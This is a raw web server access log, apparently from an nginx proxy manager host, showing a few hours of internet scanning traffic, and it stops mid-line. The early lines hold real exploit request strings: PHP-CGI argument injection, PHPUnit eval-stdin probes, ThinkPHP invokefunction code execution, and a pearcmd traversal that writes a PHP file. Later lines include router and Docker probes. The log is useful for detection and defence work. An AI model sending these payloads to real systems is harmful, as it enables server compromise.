"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 216.108.237.50] [Length 154] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:17 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:18 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:19 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:20 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:21 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:22 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:23 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:24 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:24 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:25 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:26 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:26 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:27 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:28 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:28 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:29 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:29 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:30 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:31 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:31 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:32 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:33 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:33 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:34 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:35 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:35 +0000] 404 - GET http 78.131.122.113 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:36 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:37 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:37 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:38 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:39 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:39 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:40 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:40 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:41 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:42 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:43 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:43 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:44 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:44 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:45 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:46 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:22:07:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:22:11:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:22:12:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 52.249.221.45] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[31/Jan/2026:22:13:16 +0000] 400 - GET http 78.131.122.113 "/" [Client 117.40.114.25] [Length 252] [Gzip -] "-" "-" +[31/Jan/2026:22:13:26 +0000] 400 - - http localhost "-" [Client 59.173.109.222] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:22:13:54 +0000] 400 - GET http 78.131.122.113 "/" [Client 116.178.131.51] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[31/Jan/2026:22:14:27 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 42.224.194.87] [Length 122] [Gzip 1.35] "Hello, World" "-" +[31/Jan/2026:22:14:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 42.224.194.87] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:22:14:54 +0000] 400 - GET http 78.131.122.113 "/" [Client 182.119.227.205] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[31/Jan/2026:22:15:41 +0000] 400 - GET http 78.131.122.113 "/" [Client 110.177.183.245] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[31/Jan/2026:22:31:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:22:31:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:22:39:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:01:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:04:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:06:46 +0000] 404 - POST http 78.131.122.113 "/goform/formJsonAjaxReq" [Client 176.65.139.8] [Length 150] [Gzip -] "Go-http-client/1.1" "http://78.131.122.113:80/home.asp" +[31/Jan/2026:23:12:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:17:21 +0000] 404 - GET http 78.131.122.113 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[31/Jan/2026:23:19:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:27:34 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:31:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:32:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:23:34:11 +0000] 200 - GET http 78.131.122.113 "/" [Client 8.217.235.221] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[31/Jan/2026:23:36:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 45.187.113.15] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[31/Jan/2026:23:37:39 +0000] 400 - GET http 78.131.122.113 "/" [Client 167.94.146.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[31/Jan/2026:23:37:39 +0000] 400 - - http localhost "-" [Client 167.94.146.60] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:23:37:43 +0000] 400 - GET http 78.131.122.113 "/robots.txt" [Client 167.94.146.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[31/Jan/2026:23:38:11 +0000] 404 - GET http 78.131.122.113 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[31/Jan/2026:23:51:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[31/Jan/2026:23:57:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 185.180.140.101] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[31/Jan/2026:23:57:39 +0000] 404 - GET http 78.131.122.113 "/console" [Client 185.180.140.103] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[31/Jan/2026:23:58:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:00:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:01:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 65.49.1.80] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[01/Feb/2026:00:03:05 +0000] 404 - GET http 78.131.122.113 "/webui/" [Client 65.49.1.80] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[01/Feb/2026:00:04:48 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:00:05:36 +0000] 404 - GET http 78.131.122.113 "/geoserver/web/" [Client 65.49.1.80] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[01/Feb/2026:00:06:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:07:02 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:00:09:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:25:36 +0000] 404 - GET http 78.131.122.113 "/developmentserver/metadatauploader" [Client 20.40.217.42] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:00:27:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:28:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:33:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:42:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.66] [Length 0] [Gzip -] "-" "-" +[01/Feb/2026:00:51:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:00:54:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 165.154.226.238] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[01/Feb/2026:00:54:02 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:00:54:02 +0000] 400 - GET http 78.131.122.113 "/" [Client 206.189.234.139] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[01/Feb/2026:00:54:03 +0000] 404 - GET http 78.131.122.113 "/robots.txt" [Client 165.154.226.238] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[01/Feb/2026:00:58:05 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:58:05 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:58:06 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:58:06 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:58:06 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:58:06 +0000] 400 - - http localhost "-" [Client 147.185.132.229] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:00:59:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:00:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:00:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:03:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.164] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:01:03:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.164] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:01:10:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 35.203.210.66] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[01/Feb/2026:01:12:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 104.199.46.221] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[01/Feb/2026:01:16:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:17:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:32:06 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:35:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 157.245.35.75] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:01:35:21 +0000] 400 - - http localhost "-" [Client 157.245.35.75] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:01:37:31 +0000] 404 - GET http 78.131.122.113 "/System/configurationFile?auth=YWRtaW46MTEK" [Client 46.226.162.154] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:01:39:17 +0000] 404 - GET http 78.131.122.113 "/hudson" [Client 172.174.200.225] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:01:44:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:51:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:01:55:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:03:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:09:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:19:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:34:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:35:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:39:50 +0000] 404 - GET http 78.131.122.113 "/ReportServer" [Client 20.55.88.105] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:02:40:24 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:02:45:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:46:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" "http://78.131.122.113:80/" +[01/Feb/2026:02:50:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:02:55:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 